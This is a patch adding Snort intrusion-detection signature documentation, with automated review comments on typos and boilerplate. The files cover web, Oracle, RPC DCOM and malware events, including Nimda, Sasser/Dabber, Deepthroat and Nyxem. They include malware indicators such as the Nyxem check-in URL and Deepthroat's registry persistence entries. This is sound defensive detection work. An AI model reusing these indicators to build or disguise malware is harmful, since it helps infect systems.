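Review bot: the Summary and Detailed Information describe no specific vulnerability ("Many known vulnerabilities exist ... the attack scenarios are legion"), so the document never tells the reader what request pattern SID 1770 looks for or which product is affected; the rule's actual target should be named and Additional References filled in, otherwise the "None known." under False Positives cannot be assessed.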
--- /dev/null
+++ b/doc/signatures/1233.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1233
+
+--
+Summary:
+This event is generated when an attempt is made to exploit an 
+authentication vulnerability in a web server or an application running
+on that server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
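Review bot: the Affected Systems section in this hunk is empty (the heading is followed directly by the separator), unlike the other signature files in this patch; it should at least state the server or application the rule is written for. The same typo as in the other files appears in Detailed Information: "running ona web server".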
--- /dev/null
+++ b/doc/signatures/2660.txt
@@ -0,0 +1,54 @@
+Rule: 
+
+--
+Sid: 
+2660
+
+-- 
+Summary: 
+This rule is intended to increase the accuracy of rules designed to
+generate events based on attempts to exploit implementations of Secure
+Socket Layer (SSL) version 2.
+
+-- 
+Impact: 
+None. This is a protocol decode rule that does not generate events.
+
+--
+Detailed Information:
+This is a protocol decode rule that does not generate events.
+
+--
+Affected Systems:
+NA
+
+--
+Attack Scenarios: 
+NA
+
+-- 
+Ease of Attack: 
+NA
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+NA
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
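Review bot: since the Summary says this rule exists only to improve the accuracy of the SSLv2 rules and the Impact says it generates no events itself, the document should list the SIDs that depend on it, because disabling this rule silently breaks those detections and nothing in the file warns an operator of that. Also "Secure Socket Layer" should be "Secure Sockets Layer", and several "-- " separators carry trailing whitespace.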
--- /dev/null
+++ b/doc/signatures/2691.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2691
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure parallel_push_recovery
+. This procedure is included in
+sys.dbms_defer_internal_sys.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
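Review bot: in Detailed Information the line break before the period ("parallel_push_recovery" / ". This procedure is included in") splits the sentence and should be joined; Affected Systems reads "Oracle Oracle9i" (duplicated vendor name); and the Corrective Action "Apply the appropriate vendor supplied patch" lacks a period and a pointer to that patch, while Additional References is empty even though a specific package and procedure are named.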
--- /dev/null
+++ b/doc/signatures/1254.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1254
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
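Review bot: this hunk is the CGI boilerplate with "CGI" replaced by "PHP"; the credential-validation paragraph in Detailed Information describes an authentication bypass while the Summary speaks of a known vulnerability in a PHP application, so the text does not identify what SID 1254 detects. As with the other generic files, name the script and add a reference; the "running ona web server" typo is present here too.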
--- /dev/null
+++ b/doc/signatures/438.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+
+Sid:
+438
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect with an undefined ICMP code.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+ICMP datagrams with undefined codes should never be seen on the network.  This could be an indication of nefarious activity on the network.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
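Review bot: this file has no Affected Systems section at all (the document jumps from Detailed Information to Attack Scenarios), and the Impact section describes what a redirect normally means rather than the impact of a redirect with an undefined code; the second paragraph of Detailed Information ("could be an indication of nefarious activity") is the impact statement and belongs under Impact. Wording in Detailed Information: "the datagrams destination" needs the possessive and "is then forward to" should be "forwarded". The False Negatives entry is also missing the blank line before its "--" separator that every other section in the file has.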
--- /dev/null
+++ b/doc/signatures/1826.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+1826
+
+--
+Summary:
+This event is generated when an attempt is made to access the WEB-INF
+directory on a web server.
+
+--
+Impact:
+Information disclosure.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access the WEB-INF
+directory on a web server.
+
+Multiple vendors are affected by an information disclosure issue where
+sensitive contents of a web application server can be revealed to an
+attacker by requesting the contents of this directory.
+
+--
+Affected Systems:
+	Multiple vendors, see references.
+
+--
+Attack Scenarios:
+The attacker can make a simple web request for the directory that will
+reveal the sensitive files. The attacker can then retrieve the files for
+information that can be used in later attacks against the server or
+application.
+
+--
+Ease of Attack:
+Simple. Exploit software not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
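Review bot: Affected Systems says "Multiple vendors, see references." but the Additional References section at the end of the hunk is empty, so the pointer leads nowhere; either list the affected application servers or add the vendor advisories. Given that Detailed Information says the disclosure happens by requesting the directory directly, the Corrective Action could also state the configuration fix of denying direct requests for the WEB-INF path rather than relying on patches alone.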
--- /dev/null
+++ b/doc/signatures/100000111.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000111
+
+-- 
+Summary: 
+This event is generated when the Dabber virus attempts to exploit a 
+vulnerability in the FTP server installed by the Sasser virus.
+
+-- 
+
+Impact: 
+If the Sasser virus is currently running on the affected system, then the 
+Dabber virus will be able to install itself as well.
+
+--
+Detailed Information:
+Some variants of the Sasser virus install an FTP server that listens on port 
+1023. However, this FTP server suffers from a buffer overflow in the PORT 
+command, which can be exploited with a command of 100 or more characters. The 
+Dabber virus makes use of this vulnerability as an infection vetor.
+
+--
+Affected Systems:
+Any machine with a variant of the Sasser virus whose FTP server listens on port 
+1023. 
+
+--
+
+Attack Scenarios: 
+A known virus scans the Internet in search of vulnerable systems.
+
+-- 
+
+Ease of Attack: 
+Simple, as the virus is in the wild.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Users should employ a virus removal tool to clean their system of both Dabber 
+and Sasser, and then apply the latest security patches from Microsoft to 
+prevent further infections.
+
+--
+Contributors: 
+Matt Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+http://www.microsoft.com/technet/security/bulletin/MS04-011.mspx
+
+--
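Review bot: "infection vetor" in Detailed Information should be "infection vector". The blank-line layout is inconsistent within the file (some "--" separators are followed by an empty line before the heading, others are not), and the contributor address "mwatchinski@sourcefire.com" differs from the "matt.watchinski@sourcefire.com" form used in the other files in this patch; one form should be used throughout.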
--- /dev/null
+++ b/doc/signatures/1481.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1481
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
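Review bot: apart from the Sid line, this hunk is the same text as the 1648.txt file earlier in this patch, so neither document says what distinguishes SID 1481 from SID 1648; each file needs the name of the CGI script or vulnerability its rule matches, plus a reference, or the documentation adds nothing over the rule message itself.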
--- /dev/null
+++ b/doc/signatures/1290.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1290
+
+--
+Summary:
+This event is generated when an attempt is made to load and run
+readme.eml, which is used as an infection vector for the nimda worm.
+
+--
+Impact:
+The source address is likely infected with the Nimda worm. The
+destination, without adequate AntiVirus protection and the proper
+patches, may now be infected and may attempt to infect other hosts using
+this or any of the other infection vectors that the Nimda worm uses.
+
+--
+Detailed Information:
+The nimda worm affects Microsoft Windows systems and attempts to spread
+via email, network shares and Microsoft IIS servers. A compromised
+server will attempt to spread and infect other vulnerable hosts.
+
+--
+Affected Systems:
+	Microsoft Windows 95, 98, ME, NT and 2000 
+
+--
+Attack Scenarios:
+This is worm activity.
+
+--
+Ease of Attack:
+Simple. Nimda is a worm, so the attack is automated. Exposure of unprotected
+systems to the internet has been know to result in an infection within
+15 minutes.
+
+--
+False Positives:
+None Known
+Web pages containing the Javascript as text in a web page may activate
+this alert. Web-sites detailing Nimda infection vectors may also trigger this event.
+
+--
+False Negatives:
+Nimda has multiple infection vectors. This rule alone will only detect
+a particular type.
+
+--
+Corrective Action:
+Ensure all servers within your domain are protected to the appropriate
+patch-levels to mitigate infection and spread of the Nimda worm.
+
+Ensure network clients in your domain are also appropriately patched and are
+running up to date AntiVirus software.
+
+--
+Contributors:
+Original rule writer unknown
+Snort documentation contributed by Giles Coochey	and Josh Gray
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+
+Cisco:
+http://www.cisco.com/warp/public/cc/so/cuso/epso/sqfr/snam_wp.htm
+
+Microsoft:
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/Nimda.asp
+http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/topics/NimdaIE6.asp
+
+SecurityFocus
+http://online.securityfocus.com/archive/75/215118
+
+--
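Review bot: the False Positives section contradicts itself: "None Known" is immediately followed by two sentences describing false positives (web pages containing the Javascript as text, sites documenting Nimda infection vectors); the "None Known" line should be dropped. Also "has been know to result" should be "known", the worm name is written both "nimda" and "Nimda", and the contributors line "Giles Coochey	and Josh Gray" contains a literal tab instead of a space.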
--- /dev/null
+++ b/doc/signatures/3244.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3244
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
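Review bot: Additional References is empty although this is a documented Microsoft RPC DCOM vulnerability with a list of affected Windows versions; the Microsoft security bulletin those versions come from should be cited. "Expoit code exists" should be "Exploit". The Impact says "full administrator access" while Detailed Information says the code runs with "the privileges of the local system account"; the latter is the precise statement and the Impact should match it.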
--- /dev/null
+++ b/doc/signatures/100000563.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000563
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "GL-SH Deaf Forum" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "page" parameter in the "show.php" script used 
+by the "GL-SH Deaf Forum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using GL-SH Deaf Forum
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
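Review bot: the Impact and the second paragraph of Detailed Information overstate a cross site scripting issue: "system integrity compromise", "administrative access to the server" and "execute system binaries" describe server-side code execution, whereas the Attack Scenarios paragraph correctly describes the actual risk (a crafted link that steals information from the user who clicks it). The Impact should say that the target is the user's browser session, not the server. Several "--" separators here (after the Sid, after Affected Systems, after Contributors) lack the blank line used elsewhere in the file.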
--- /dev/null
+++ b/doc/signatures/100000641.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000641
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "template_modify.php" using a remote file being passed as 
+the "admin_template_path" parameter may indicate that an exploitation attempt 
+has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"template_modify.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
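Review bot: the third paragraph of Detailed Information and the whole Attack Scenarios section are the authentication-bypass boilerplate ("supply his/her own credentials"), which does not describe the remote file include via "admin_template_path" that the Summary documents; Attack Scenarios should describe the inclusion of an attacker-supplied file by that parameter. "an exploitation attempt has been attempted" in the Summary is redundant ("has been made").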
--- /dev/null
+++ b/doc/signatures/1984.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1984
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
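Review bot: under Corrective Action, "Registry keys added are: Systemtray" names a value under the listed "...\CurrentVersion\Run\" key, not a key, and the text should say so because a reader searching for a key of that name will not find one. "Deepthroat sever" should be "server". The removal instruction deletes "systray.exe" by name; since a legitimate Windows 9x component is also called systray.exe, the text should tell the reader how to identify the trojan copy (location, size or hash) before deleting it. This file also lacks an Affected Systems section; the OS list sits in Detailed Information instead.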
--- /dev/null
+++ b/doc/signatures/100000351.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000351
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "UBBThreads" application running on a webserver. Access to the file "config[cookieprefix]" using a remote file being passed as the "w3t_language" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "w3t_language" parameter in the "config[cookieprefix]" script used by the "UBBThreads" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using UBBThreads
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
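Review bot: the Summary says "Access to the file "config[cookieprefix]"", but config[cookieprefix] has the form of a PHP request parameter, not a file name, and Detailed Information repeats it as the ""config[cookieprefix]" script"; it looks as if the file name and a parameter name were swapped when the template was filled in. The actual UBBThreads script should be named (it does not appear anywhere in this patch, so it has to come from the rule itself). The hunk also starts with two empty added lines before "Rule:", and the credentials boilerplate paragraph again does not fit a remote file include.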
--- /dev/null
+++ b/doc/signatures/100000775.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000775
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "PHPSESSID" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "PHPSESSID" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
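Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application ... validating the credentials of a client host") does not describe an SQL injection via "PHPSESSID" in "index.php"; it is the credential-validation boilerplate from the authentication template and should be dropped or replaced with text about injection into the backend query. The second paragraph is a comma splice ("... compromise the database backend for the application, the attacker may also ..."); split it into two sentences. Style points: "attackers choosing" should be "attacker's choosing", "an exploitation attempt has been attempted" is redundant, and the separator "--" after Sid, Affected Systems and Contributors lacks the blank line that the other files in this patch use before it.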
--- /dev/null
+++ b/doc/signatures/100000226.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+100000226
+
+--
+Summary:
+This event is generated when a host connected to the Internet is first infected 
+with the BlackWorm/Nyxem virus.
+
+--
+Impact:
+The system generating the alert has likely been infected with the 
+BlackWorm/Nyxem virus.
+
+--
+Detailed Information:
+When a system is first infected with the BlackWorm/Nyxem virus, the malicious 
+program attempts to access 
+http://207.172.16.155/cgi-bin/Count.cgi?df=76547 in order to report a 
+successful installation. Numerous sources, including the Sourcefire VRT, have 
+confirmed that this URL is static.
+
+--
+Affected Systems:
+All Windows systems.
+
+--
+Attack Scenarios:
+The virus may arrive by e-mail, in which case a user must execute the file in 
+order to be infected. Once infected, hosts conduct NetBIOS scans and attempt to 
+infect other hosts via publicly accessible shares; in this method, no user 
+interaction is required.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+Any user who directs a web browser to 
+http://207.172.16.155/cgi-bin/Count.cgi?df=76547 will trigger this rule.
+
+--
+False Negatives:
+Hosts without Internet access which become infected (i.e. by another infected 
+system on their local network) will not trigger this rule until they connect to 
+the Internet, as they will be unable toaccess this web page.
+
+--
+Corrective Action:
+Several antivirus vendors have detection and removal capabilities. 
+Additionally, Microsoft has detailed instructions for manual removal on their 
+web site.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matthew Watchinski <mwatchinski@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+
+--
+Additional References:
+
+--
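Review bot: the Corrective Action section says "Microsoft has detailed instructions for manual removal on their web site" but Additional References is empty; add the vendor and antivirus write-ups it is pointing at so an analyst handling the alert can find them. Typos: "unable toaccess this web page" should be "unable to access", and "(i.e. by another infected system on their local network)" should be "e.g.", since that is one example of an infection path rather than a definition.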
--- /dev/null
+++ b/doc/signatures/100000124.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+100000124
+
+--
+Summary:
+This event is generated when inappropriate content is detected in network 
+traffic.
+
+--
+Impact:
+Possible policy violation.
+
+--
+Detailed Information:
+This event is generated when inappropriate content is detected in network 
+traffic. Specifically, the content "girls gone wild" was observed.
+
+--
+Affected Systems:
+ All systems.
+
+--
+Attack Scenarios:
+This event indicates that inappropriate content may have been accessed from a 
+host on the protected network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+This may be a policy violation, refer to the appropriate internal policy.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
